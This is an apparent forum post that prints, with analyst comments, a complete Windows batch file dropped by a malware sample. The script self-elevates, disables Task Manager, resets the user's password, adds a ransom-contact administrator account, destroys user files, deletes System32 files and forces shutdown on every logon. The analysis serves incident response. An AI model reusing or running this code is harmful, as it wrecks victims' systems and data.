这是病毒 exe 生成的 bat 文件,解压密码为 threatbook。
看了下,代码为:
- rem Analyst note: batch file dropped by the sample. Execution is staged across runs.
- rem Run 1 only writes and shows warn1.vbs. Run 2 shows more warnings and creates C:\Windows\tat.txt.
- rem A later run that finds both warn1.vbs and tat.txt jumps to the destructive part at :hack.
- rem The forum software turned the leading "@Shift" and "@echo" on the next two lines into
- rem user-mention links; the original lines were presumably "@Shift /0" and "@echo off".
- [url=home.php?mod=space&uid=500624]@Shift[/url] /0
- [url=home.php?mod=space&uid=331734]@echo[/url] off
- rem Work from the current user's Desktop; the warning scripts below are created there.
- cd C:\Users\%username%\Desktop\
- rem warn1.vbs doubles as the "has run before" marker that selects the branch.
- if not exist warn1.vbs (goto vbs1)
- if exist warn1.vbs (goto vbs2)
- : vbs1
- rem First run: append a message box line to warn1.vbs, display it, and stop.
- echo msgbox "这是个病毒,如果是不小心点的,别再点了" >>warn1.vbs
- start warn1.vbs
- exit
- : vbs2
- rem Later runs: rewrite warn2.vbs with two message boxes, then check the second marker.
- echo msgbox "这是个病毒,说过了吧" >warn2.vbs
- echo msgbox "如果这真的是测试环境,欢迎您再次双击进行测试" >>warn2.vbs
- goto startahead
- :wwaarrnn
- rem Reached from :create only: show warn2.vbs and stop without touching anything else.
- start warn2.vbs
- exit
- : startahead
- rem C:\Windows\tat.txt is the second marker; its presence is what arms the payload.
- rem Useful as a host indicator together with warn1.vbs, warn2.vbs and 警告.vbs on the Desktop.
- if not exist C:\Windows\tat.txt (goto create)
- if exist C:\Windows\tat.txt (goto hack)
- : create
- rem Show a last warning and drop the marker file.
- rem NOTE(review): creating a file under C:\Windows presumably needs write access there; confirm
- rem what happens for a non-elevated user, since a failed write would keep the script in this branch.
- echo msgbox "这是最后一次警告!!!" >>警告.vbs
- start 警告.vbs
- echo come on!!! >>C:\Windows\tat.txt
- goto wwaarrnn
- rem The exit below is never reached because of the goto above.
- exit
- :hack
- rem Payload entry point. Summary of this part: request elevation, disable Task Manager for the
- rem current user, then change local account credentials through a generated lock.bat.
- rem Self-elevation idiom: on the first pass %1 is empty, so mshta relaunches this same file with
- rem the "runas" verb, a hidden window (0) and "::" as its argument, and the current instance exits.
- rem In the relaunched copy %1 expands to "::", which turns this line into a comment.
- %1 start "" mshta vbscript:createobject("shell.application").shellexecute("""%~0""","::",,"runas",0)(window.close)&exit
- rem Sets the per-user policy value DisableTaskMgr=1, which blocks Task Manager for this account.
- rem Remediation: delete this value or set it back to 0.
- reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001
- echo 这是个病毒,作者说过了吧
- rem choice with a 2 second timeout and a default answer is used here as a delay.
- choice /t 2 /d y /n >nul
- cls
- rem The next lines append commands to lock.bat in the current directory and then run it.
- echo @echo off>>lock.bat
- rem Changes the current account's password to the literal on this line; %username% is expanded
- rem when the line is written. The value is visible here, which a responder needs to log back in.
- echo net user %username% 5539661qpec >>lock.bat
- rem "ehco" is not a command, so this line fails and nothing about the guest account is appended.
- ehco net user guest /active :yes>>lock.bat
- rem Creates a local account whose name is the contact text and whose password is "administrator",
- rem then adds it to the local Administrators group. The unexpected account is a host indicator.
- echo net user 要密码加QQ3051200685 administrator /add>>lock.bat
- echo net localgroup administrators 要密码加QQ3051200685 /add >>lock.bat
- echo exit >>lock.bat
- start lock.bat
- cls
- rem Taunt text printed to the console; no effect on the system.
- echo 今天
- echo 是
- echo 多么美好的一天
- echo 所以
- echo 接受审判吧,你这狂妄之人
- choice /t 2 /d y /n >nul
- cls
- color a
- rem Same elevation idiom as at the top of :hack, repeated before the file operations that follow.
- %1 start "" mshta vbscript:createobject("shell.application").shellexecute("""%~0""","::",,"runas",0)(window.close)&exit
- rem File-damage stage. The same two-line pattern is applied to the system drive root, the user
- rem profile root and a fixed list of profile folders. In each folder:
- rem   line 1 renames every file to name.ext.光墓data, then renames this script back to .bat;
- rem   line 2 writes a certutil -encode copy of each renamed file as name.ext.光墓是你爸.
- rem certutil -encode is Base64 encoding, not encryption: no key is involved, and a surviving
- rem .光墓是你爸 file can be restored with certutil -decode.
- rem The loops use a plain wildcard without /r, so only files directly in each folder are processed.
- md %temp%\tmprun
- cd %SystemDrive%\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %UserProFile%\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- rem Each "cd %temp%\tmprun" below is immediately followed by another cd, so no file work
- rem is done inside tmprun in this listing.
- cd %temp%\tmprun
- cd %UserProFile%\Desktop\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %temp%\tmprun
- cd %UserProFile%\Downloads\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %temp%\tmprun
- cd %UserProFile%\Favorites\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %temp%\tmprun
- cd %UserProFile%\Searches\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %temp%\tmprun
- cd %UserProFile%\Saved Games\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %temp%\tmprun
- cd %UserProFile%\Contacts\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %temp%\tmprun
- cd %UserProFile%\Links\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %temp%\tmprun
- cd %UserProFile%\Videos\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %temp%\tmprun
- cd %UserProFile%\Pictures\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %temp%\tmprun
- cd %UserProFile%\Documents\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- cd %temp%\tmprun
- cd %UserProFile%\Music\
- for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"
- for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爸"
- rem Recursive, quiet delete of every renamed original from the system drive root downwards.
- rem After this line only the Base64 copies remain, so responders should preserve the
- rem .光墓是你爸 files. Detection: certutil -encode run in bulk over user folders.
- cd %SystemDrive%\
- del /s /q *.光墓data
- rem Final stage: desktop flooding, persistence, deletion of system files, forced shutdown.
- rem Cleanup pointers visible in this part: HKCU Run values "winstat" and "winrar", the files
- rem bili.bat and down.bat on the Desktop, and C:\Windows\System32\lock.bat.
- rem Killing explorer.exe removes the desktop shell and taskbar.
- taskkill /f /im explorer.exe
- cd C:\Users\%username%\Desktop\
- rem Creates folders b1 to b100 on the Desktop and copies this script into each of them.
- for /l %%i in (1, 1, 100) do md b%%i
- for /l %%i in (1, 1, 100) do copy %0 b%%i
- rem Writes 100 text files into each folder. They are ordinary files containing "1";
- rem nothing in this line makes them undeletable despite the file name.
- for /l %%i in (1, 1, 100) do for /l %%q in (1,1,100) do echo 1 >b%%i\第%%q个无法删除的文件.txt
- rem Builds one VBScript per folder that shows a message box in an endless do/loop.
- for /l %%i in (1, 1, 100) do echo do >>b%%i\提示%%i.vbs
- for /l %%i in (1, 1, 100) do echo msgbox "这是你的第%%i个文件夹",16,"病毒提示" >>b%%i\提示%%i.vbs
- for /l %%i in (1, 1, 100) do echo loop >>b%%i\提示%%i.vbs
- rem Moves the Base64 copies from the Desktop into the b folders; the first iteration that
- rem succeeds takes all of them, so they presumably end up in b1.
- for /l %%i in (1, 1, 100) do move *.光墓是你爸 b%%i\
- rem Launches every message box script that was created.
- for /l %%i in (1, 1, 100) do if exist "b%%i\提示%%i.vbs" (
- start b%%i\提示%%i.vbs )
- rem Marks the folders system and hidden. The path is hard-coded to the Administrator profile,
- rem while the folders were created under the %username% Desktop, so this only matches for that user.
- for /l %%i in (1, 1, 100) do attrib +s +h "C:\Users\Administrator\Desktop\b%%i"
- taskkill /f /im wscript.exe
- rem Second batch of 100 message box scripts in a folder named 加密, started, hidden, then killed.
- md 加密
- for /l %%i in (1, 1, 100) do echo msgbox "我们隐藏了第%%i个文件夹" >>加密\加密%%i.vbs
- for /l %%i in (1, 1, 100) do start 加密\加密%%i.vbs
- attrib +s +h "C:\Users\Administrator\Desktop\加密"
- taskkill /f /im wscript.exe
- rem Copies this script into System32 as lock.bat. No line in this listing launches or registers
- rem that copy, but it should be removed during cleanup.
- copy %0 C:\Windows\System32\lock.bat
- rem de.bat runs a recursive, quiet delete from the current directory, which is the Desktop.
- rem NOTE(review): this would also remove the Base64 copies moved into the b folders; confirm.
- echo del *.* /s /q tree>>de.bat
- start de.bat
- rem bili.bat force-kills explorer.exe and wininit.exe; wininit.exe is a critical system process.
- echo taskkill /f /im explorer.exe >>bili.bat
- echo taskkill /f /im wininit.exe >>bili.bat
- rem This echo has no redirection, so it only prints the word and adds nothing to bili.bat.
- echo shutdown
- rem Persistence: Run value "winstat" starts bili.bat at every logon of this user.
- reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v winstat /t reg_sz /d C:\Users\%username%\Desktop\bili.bat
- attrib +s +h C:\Users\%username%\Desktop\bili.bat
- rem Removes the account-changing helper from the Desktop after it has been started.
- del lock.bat
- rem e.bat and f.bat delete *.dll and *.sys directly under System32 and then delete themselves.
- rem Files in use or protected by permissions may survive; the result is an unstable or
- rem unbootable system that needs repair or reinstallation rather than simple cleanup.
- echo del C:\Windows\System32\*.dll>>e.bat
- echo del e.bat >>e.bat
- start e.bat
- echo del C:\Windows\System32\*.sys>>f.bat
- echo del f.bat >>f.bat
- start f.bat
- rem 11.vbs receives two lines of filler text and is not started anywhere in this listing.
- echo nuiehewio>>11.vbs
- echo oueif89y32983>>11.vbs
- rem equ.vbs is an endless message box loop; sta.bat starts it repeatedly in its own endless loop.
- echo do>>equ.vbs
- echo msgbox ("DE DEUHOU")>>equ.vbs
- echo loop >>equ.vbs
- echo :a >>sta.bat
- echo start equ.vbs >>sta.bat
- echo goto a >>sta.bat
- start sta.bat
- rem down.bat holds a shutdown command with a 2 second timer. It is not started here; the Run
- rem value "winrar" below makes it run at every logon, forcing a shutdown each time.
- echo shutdown /s /t 2 /c "You are FUCKED!!!">>down.bat
- start notepad.exe
- reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v winrar /t reg_sz /d C:\Users\%username%\Desktop\down.bat
- start notepad.exe
- TASKKILL /F /IM WSCRIPT.EXE
- rem Shuts the machine down 5 seconds after the script reaches this point.
- shutdown /s /t 5 /c "Bye~Bye"